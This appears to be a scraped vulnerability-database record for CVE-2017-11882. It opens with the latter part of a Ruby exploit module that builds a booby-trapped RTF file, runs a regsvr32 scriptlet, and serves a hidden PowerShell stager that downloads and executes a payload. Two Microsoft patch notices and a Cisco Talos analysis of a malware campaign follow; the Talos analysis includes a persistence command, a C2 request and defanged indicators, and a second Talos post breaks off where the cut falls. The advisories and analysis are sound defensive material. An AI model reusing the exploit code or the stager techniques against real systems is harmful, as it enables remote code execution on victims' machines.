'01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\r\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\r\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\r\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\r\n footer << '00030000000000' + \"\\n\"\r\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\r\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\r\n footer << 
\"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\r\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\r\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\r\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\r\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\r\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\r\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\r\n footer << \"00000000\\n\"\r\n footer << \"}}}\\n\"\r\n footer << '\\par}' + \"\\n\"\r\n\r\n\r\n payload = shellcode\r\n payload += [0x00402114].pack(\"V\")\r\n payload += \"\\x00\" * 2\r\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\r\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\r\n payload = header + object_class + payload + footer\r\n payload\r\n end\r\n\r\n\r\n\r\n def gen_psh(url, *method)\r\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\r\n\r\n if method.include? 'string'\r\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\r\n else\r\n # Random filename to use, if there isn't anything set\r\n random = \"#{rand_text_alphanumeric 8}.exe\"\r\n # Set filename (Use random filename if empty)\r\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\r\n\r\n # Set path (Use %TEMP% if empty)\r\n path = datastore['BinaryEXE-PATH'].blank? ? 
\"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\r\n\r\n # Join Path and Filename\r\n file = %Q(echo (#{path}+'\\\\#(unknown)'))\r\n\r\n # Generate download PowerShell command\r\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\r\n end\r\n\r\n download_and_run = \"#{ignore_cert}#{download_string}\"\r\n\r\n # Generate main PowerShell command\r\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\r\n end\r\n\r\n def on_request_uri(cli, _request)\r\n if _request.raw_uri =~ /\\.sct$/\r\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\r\n payload = gen_psh(\"#{get_uri}\", \"string\")\r\n data = gen_sct_file(payload)\r\n send_response(cli, data, 'Content-Type' => 'text/plain')\r\n else\r\n print_status(\"Delivering payload to #{cli.peerhost}...\")\r\n p = regenerate_payload(cli)\r\n data = cmd_psh_payload(p.encoded,\r\n payload_instance.arch.first,\r\n remove_comspec: true,\r\n exec_in_place: true\r\n )\r\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\r\n end\r\n end\r\n\r\n\r\n def rand_class_id\r\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\r\n end\r\n\r\n\r\n def gen_sct_file(command)\r\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\r\n if command == ''\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\r\n # If a command is provided, tell the target system to execute it.\r\n else\r\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\r\n 
end\r\n end\r\n\r\n\r\n def primer\r\n file_create(generate_rtf)\r\n end\r\nend\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/29119", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:49:52", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for Office 2010: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2687455\">Service Pack 2 for Office 2010</a> installed on the computer.</p><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a aria-live=\"rude\" bookmark-id=\"officeinstall\" class=\"managed-link content-anchor-link\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" tabindex=\"0\" target=\"\">Determining your Office version</a>).</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB2553204\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=215fab9f-ab5b-4a8e-ae2d-858a9001332e\" managed-link=\"\">Download the security update KB2553204 for the 32-bit version of Office 2010</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=bea73649-b3bc-4fad-ad1d-1a8c374fd8e4\" managed-link=\"\">Download the security update KB2553204 for the 64-bit version of Office 2010</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\">security update deployment information: November 14, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update doesn't replace any previously released 
update.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 2</th></tr><tr><td>eqnedt322010-kb2553204-fullfile-x64-en-us.exe</td><td>F0856A37C414C8E5953BCF3C0D299C72053CD0CB</td><td>D1443883888C39BA42FCECAC4EC8FA1A5EF819BC176A209DFEDB3C4967DEBA2E</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x64-zh-cn.exe</td><td>25E3FE752F887E845BB89059DADF647148F53C17</td><td>11ACB21F7B5A77401C9EE9C22ED51F0F20BDB089F3BE46A281DBE5FDC925B301</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x86-en-us.exe</td><td>A45E3A34CC22713D9BB9EC196A44C05CD0A51F16</td><td>A50E99A89B32EC465860F5348F7469F09D24279C0BF6EFBCD7097E2BA51B0860</td></tr><tr><td>eqnedt322010-kb2553204-fullfile-x86-zh-cn.exe</td><td>F8489D5D5C95844C643C7F7A2EB011AAFD1D1C8F</td><td>78EA399D1921E04102491D8E412747C5C49BA4F6ECFCD0327EB3176C76FA5644</td></tr></tbody></table><h3>File information</h3><p>The dates and\u00a0times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.</p><h4>For all supported x86-based versions of Office 2010</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr></tbody></table><h4>For all supported x64-based versions of Office 2010</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>eqnedt32.exe_1033</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552,680</td><td>02-Nov-2017</td><td>07:54</td></tr></tbody></table><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International 
Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p></body></html>", "edition": 4, "modified": "2020-04-16T06:54:36", "id": "KB2553204", "href": "https://support.microsoft.com/en-us/help/2553204/", "published": "2017-11-14T00:00:00", "title": "Description of the security update for Office 2010: November 14, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:38:14", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for 2007 Microsoft Office Suite: November 14, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/949585\">Service Pack 3 for the 2007 Microsoft Office Suite</a> installed on the computer.</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011276\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=f6c365a1-80f6-464b-96df-d32508a46757\" managed-link=\"\">Download the security update KB4011276 for the 32-bit version of 2007 Microsoft Office Suite</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\">security update deployment information: November 14, 2017</a>.</p><h3>Security update replacement information</h3><p>This security update doesn't replace any previously released update.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package Name</th><th>Package Hash SHA 1</th><th>Package Hash SHA 
2</th></tr><tr><td>eqnedt322007-kb4011276-fullfile-x86-en-us.exe</td><td>5BDF63F270C8389181BCA75D2C5CDED6E5B58978</td><td>9AE1D3A1109C731EE1C730A6864D9F0F944BF14404C31943619EFECC2E1B1BE3</td></tr><tr><td>eqnedt322007-kb4011276-fullfile-x86-zh-cn.exe</td><td>E82D11355EF17642A56A10C7216BFD33B697321C</td><td>C8B36716E0E56807517A96DFAC8235F0B76EF5AC77F5A7EF4B38011EB90EE796</td></tr></tbody></table><h3>File information</h3><p>The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><h4>For all supported x86-based versions of 2007 Microsoft Office Suite</h4><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>Eqnedt32.exe_1033</td><td>2017.8.14.0</td><td>552,680</td><td>26-Oct-2017</td><td>07:29</td></tr><tr><td>Eqnedt32.exe_2052</td><td>2017.8.14.0</td><td>552,680</td><td>26-Oct-2017</td><td>07:29</td></tr></tbody></table><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local 
support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p></body></html>", "edition": 4, "modified": "2020-04-16T06:49:42", "id": "KB4011276", "href": "https://support.microsoft.com/en-us/help/4011276/", "published": "2017-11-14T00:00:00", "title": "Description of the security update for 2007 Microsoft Office Suite: November 14, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-06-05T08:31:45", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "[](<https://1.bp.blogspot.com/-0LZquP7JCK8/XPZy_5h1kXI/AAAAAAAAByw/6jEpKcjZWpIoeGKAo9GwZCUdXPfqIqjrgCLcBGAs/s1600/frankenstein.png>)_This blog was authored by [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>) and [Kendall McKay](<https://twitter.com/kkmckay22>)._\n\n### Executive summary\n\nCisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the \"Frankenstein\" campaign. We assess that the attackers carried out these operations between January and April 2019 in an effort to install malware on users' machines via malicious documents. We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein \u2014 the name refers to the actors' ability to piece together several unrelated components \u2014 leveraged four different open-source techniques to build the tools used during the campaign. 
\n \nThe campaign used components of: \n\n\n * An article to detect when your sample is being run in a VM\n * A GitHub project that leverages MSbuild to execute a PowerShell command\n * A component of a GitHub project called \"Fruityc2\" to build a stager\n * A GitHub project called \"PowerShell Empire\" for their agents\nWe believe that the threat actors behind the Frankenstein campaign are moderately sophisticated and highly resourceful. The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available solutions, possibly to improve operational security. These obfuscation techniques will require network defenders to modify their posture and procedures to detect this threat. \n \nThis report outlines the various anti-detection techniques used throughout the Frankenstein campaign. Some of these techniques included checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the sample was inside a virtual machine. The threat actors also took additional steps to respond only to GET requests that contained predefined fields, such as a non-existent user-agent string, a session cookie, and a particular directory on the domain. The threat actors also used different types of encryption in order to protect data in transit. \n \n\n\n### Trojanized documents\n\nTalos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. We were able to correlate these two techniques to the same threat campaign due to overlapping threat actor C2. 
\n \nIn the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\" that appeared to display the national flag of Jordan. Once the victim opened the document, it fetched a remote template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used [CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) to execute code on the victim's machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named \"WinUpdate\": \n \n> /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR\n\nThat scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager. The stager will be described in more detail in the next section. \n \n[](<https://1.bp.blogspot.com/--XWRPzTAtLU/XPZzGu_JVHI/AAAAAAAABy0/zqLTV6kqlQMuPROE6SJDUhG_tlH_0p3QACLcBGAs/s1600/image9.png>) \n--- \n_Example of the MinutesofMeeting-2May19.docx._ \nOne of the samples we analyzed that prompted the victim to enable macros claimed to have \"been secured by Kaspersky,\" a well-known anti-virus firm. While threat actors commonly create fake security labels for malicious documents, this technique could also indicate that the threat actor had performed reconnaissance on the intended victims, suggesting that the documents had been socially engineered to some degree. \n \n[](<https://1.bp.blogspot.com/-KdU6S2QQ8ng/XPZzODN7CrI/AAAAAAAABy4/oJpnVDnNaXkEQvVUuWw7mG0wbgtpWKbSQCLcBGAs/s1600/image7.png>) \n--- \n_Example of malicious Microsoft Word document._ \nTwo other documents we associated with this group appeared to be more targeted in nature. One document contained logos that appear to be from several Middle Eastern countries' government agencies, while the other document showed an image of unspecified buildings that were possibly recognizable to a select group of targets. 
\n[](<https://1.bp.blogspot.com/-PCw9cVa4eYc/XPZzXZotoHI/AAAAAAAABzA/fxK0s6EVod8S-UZ0SpZEimuPIOP4dBwhwCLcBGAs/s1600/image6.png>) \n--- \n_Trojanized document containing official logos._ \n[](<https://1.bp.blogspot.com/-JSClxJjhN0A/XPZze-7B3gI/AAAAAAAABzI/zBToNuJW29kq5l-08GtblTs5B0EKCB0ugCLcBGAs/s1600/image5.png>) \n--- \n_Trojanized document containing the image of unidentified buildings._ \n \n### Visual Basic script and its anti-analysis features\n\nAs soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. The VBA script contained two anti-analysis features. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running: \n\n\n * VMWare\n * Vbox\n * Process Explorer\n * Process Hacker \n * ProcMon\n * Visual Basic\n * Fiddler \n * WireShark\nNext, the script would check to see if any of the following tasks were running: \n\n\n * VMWare\n * Vbox\n * VxStream\n * AutoIT\n * VMtools\n * TCPView\n * WireShark\n * Process Explorer\n * Visual Basic \n * Fiddler\n[](<https://1.bp.blogspot.com/-D9vE5Mn4jyg/XPZzpXk2lYI/AAAAAAAABzQ/XbYcmZf1Dk4niXHbUzgiFaldqo0bW6L_QCLcBGAs/s1600/image3.png>) \n--- \n_A copy of the macro's code, which checks for analysis-oriented applications._ \nIf any of the aforementioned applications or task names were discovered during the enumeration process, the script would stop execution. The next evasion technique was to call WMI and determine the number of cores allocated to the system. If the number of cores was less than two, the script would stop execution and the end user would receive a pop-up message stating \"The File is not compatible with your Microsoft Office Version.\" We assess that this technique was modeled after a 2015 [TrustedSec report](<https://www.trustedsec.com/2015/05/bypassing-virtualization-and-sandbox-technologies/>) as a way to detect if the sample was being run in a virtual machine or a sandbox environment. 
\n \nOnce the evasion checks were complete, the threat actors used [MSbuild to execute](<https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view%3Dvs-2015>) an actor-created file named \"LOCALAPPDATA\\Intel\\instal.xml\". Based on lexical analysis, we assess with high confidence that this component of the macro script was based on an open-source project called \"[MSBuild-inline-task](<https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml>).\" While this technique was previously [documented](<https://www.carbonblack.com/2018/03/15/threat-analysis-recent-attack-technique-attempts-bypass-whitelisting-leveraging-ms-office-document-macros-msbuild-certutil/>) last year, it has rarely been observed being used in operations. Talos suspects the adversary chose MSBuild because it is a signed Microsoft binary, meaning that it can bypass application whitelisting controls on the host when being used to execute arbitrary code. \n \n[](<https://1.bp.blogspot.com/-6Zjzx9h25M4/XPZzxpDDxhI/AAAAAAAABzY/bfEvJMrlzroxM-cAe6HDCStBS_YUQWELACLcBGAs/s1600/image8.png>) \n--- \n_A copy of the threat actors' version of the MSbuild-inline-task._ \nThe last line of the file would run encoded commands from the command line: \n\n\n> cmd.exe /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe LOCALAPPDATA\\Intel\\instal.xml C:\\Windows\\System32\n\nOnce the \"instal.xml\" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. While analyzing this stager, we noticed some similarities to the \"Get-Data\" function of the [FruityC2](<https://github.com/xtr4nge/FruityC2/blob/master/agent/ps_agent.ps1>) PowerShell agent. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. 
In this sample, the threat actors' C2 server was the domain msdn[.]cloud. A copy of the deobfuscated stager can be seen in the image below. \n[](<https://1.bp.blogspot.com/-XKd76hBj3kw/XPZz6iBPv_I/AAAAAAAABzg/Z3yud4aM0ZAFjcv_u7zXphCKGdQViDeigCLcBGAs/s1600/image4.png>) \n--- \n_Copy of the deobfuscated stager._ \nWhen executed successfully, the stager connected to the C2. However, in order to receive the agent, the request needed to contain the correct directory, user-agent string, and session cookie. The anticipated GET request appeared as follows: \n\n\n> GET /FC001/JOHN HTTP/1.1 \nCookie: session=drYuSCFQdbQYHozM2dku17KYkY8= \nUser-Agent: Microsoft Internet Explorer \nHost: msdn[.]cloud \nConnection: Keep-Alive\n\nIf successful, the C2 would return a string of characters. Once the string was RC4 decrypted, it launched a [PowerShell Empire agent](<https://github.com/EmpireProject/Empire/blob/master/data/agent/agent.ps1>). The PowerShell script would attempt to enumerate the host to look for certain information, such as: \n\n\n * Username\n * Domain name\n * Machine name \n * Public IP address \n * Checks if the current user has administrative privileges\n * Obtains a list of all currently running processes\n * Calls WMI to obtain operating system version\n * Obtains the security system's SHA256 HMAC\nOnce the aforementioned information was obtained, it was sent back to the threat actor's C2. Similar to the stager, the agent included functionality to communicate via an encrypted channel, in this case AES-CBC, in addition to using a specific user-agent string and a session key. This agent would allow the threat actors to remotely interact with the agent to upload and download files and to use the various plugins that were compatible with the Empire framework, such as those used to harvest credentials on the victim's machine. While this threat actor exhibited signs of sophistication, there were some small components that were overlooked. 
For example, it appears that the threat actor forgot to configure certain components for the Empire agent, such as leaving placeholder values for some variables like \"WORKING_HOURS_REPLACE\" and \"REPLACE_KILLDATE\". \n \n\n\n### Conclusion\n\nThe actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available tools, which offer them some advantages over a completely custom toolset. A campaign that leverages custom tools is more easily attributed to the tools' developers. One example of this was the code overlap in the [VPNFilter](<https://blog.talosintelligence.com/2018/05/VPNFilter.html>) malware that allowed us to associate the activity with the Blackenergy malware. By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence. Over the past several years, there have been multiple instances of advanced threat actors using open-source techniques, such as [MuddyWater](<https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html>), among others. This growing trend highlights that highly trained operators are increasingly using unsophisticated tools to accomplish their goals. \n \n\n\n### Coverage\n\nWays our customers can detect and block this threat are listed below. \n \n[](<https://1.bp.blogspot.com/-O1GoXuet5cU/XPZ0HIGVN4I/AAAAAAAABzo/gLKmHfW-djsHQOB5R5Td_fKExQQ8c2y-ACLcBGAs/s1600/image1.png>)Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. 
Try AMP for free [here.](<http://cisco.com/go/tryamp>) \n \n[](<http://cisco.com/go/tryamp>) \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or Web Security Appliance ([WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall ([NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)), Next-Generation Intrusion Prevention System ([NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nAdditional protections with context to your specific environment and threat data are available from the [Firepower Management Center](<https://www.cisco.com/c/en/us/products/security/firepower-management-center/index.html>). \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). 
\n \n\n\n### Indicators of Compromise\n\n**Hashes** \n \n**URLs** \nhxxp://droobox[.]online/luncher.doc \nhxxp://msdn[.]cloud/FC001/JOHN \nhxxp://search-bing[.]site/FC003/User=H6szn1woY2pLV \n \n**Domains** \nmsdn[.]cloud \nsearch-bing[.]site \ndroobox[.]online \n \n\n\n", "modified": "2019-06-05T00:45:28", "published": "2019-06-05T00:45:28", "id": "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/RSmsHWqrgpk/frankenstein-campaign.html", "type": "talosblog", "title": "It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-24T16:19:06", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "[](<https://3.bp.blogspot.com/-fsip1EtsTi8/XLSoJ5Dy5zI/AAAAAAAABA0/0RFLYl6M7gEkd5gJZ7ny8_6CqYGQdB2PACLcBGAs/s1600/image2.jpg>)\n\n_[Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>) and [Holger Unterbrink](<http://blogs.cisco.com/author/holgerunterbrink>) authored this blog post._ \n \n\n\n## Executive summary\n\n \nMalware designed to steal sensitive information has been a threat to organizations around the world for a long time. The emergence of the greyware market and the increased commercialization of keyloggers, stealers, and remote access trojans (RATs) has magnified this threat by reducing the barrier to entry for attackers. 
In many cases, the adversaries leveraging these tools do not need to possess programming skills or in-depth computer science expertise, as they are now being provided as commercial offerings across the cybercriminal underground. We have previously released in-depth analyses of these types of threats and how malicious attackers are leveraging them to attack organizations with [Remcos in August](<https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html>) and [Agent Tesla in October](<https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html>).

